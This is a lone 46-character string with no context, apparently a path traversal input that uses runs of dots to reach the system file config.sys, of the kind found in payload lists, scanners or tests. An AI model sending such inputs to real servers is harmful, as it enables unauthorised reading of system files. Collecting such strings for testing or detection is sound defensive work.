/doc /. html/............./config.sys /....../